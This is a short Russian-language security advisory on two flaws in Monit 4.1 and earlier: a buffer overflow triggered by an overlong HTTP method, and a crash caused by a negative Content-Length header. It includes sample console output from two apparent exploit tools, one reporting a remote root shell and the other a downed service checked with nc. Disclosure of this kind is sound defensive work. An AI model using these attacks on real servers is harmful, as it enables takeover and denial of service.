Программа: Monit 4.1 и более ранние версии
Две уязвимости обнаружены в Monit. Злонамеренный пользователь может вызвать отказ в обслуживании или скомпрометировать уязвимую систему.
1. Удаленный атакующий может представить чрезмерно длинный HTTP метод, чтобы вызвать переполнение буфера в HTTP интерфейсе.
2. Удаленный атакующий может послать HTTP запрос с отрицательным значением в поле "Content-Length:", чтобы аварийно завершить работу целевого сервера.
Пример:
./xonya -t 3 -p 2812 192.168.3.12
Selected platform 3 ...
Retaddr is 0xXXXXXXXX, nulladdr is 0xXXXXXXXX ...
Connected to 192.168.3.12:2812
Sending the request ...
Got a remote shell:
Linux 2.4.20 i686 unknown
uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
exit
$./donit -p 2812 192.168.3.12
Connecting to 192.168.3.12:2812 ...
Sending the request ...
Done.
$ nc -v 192.168.3.12 2812
lina.s-quadra.com [192.168.3.12] 2812 (?) : Connection refused
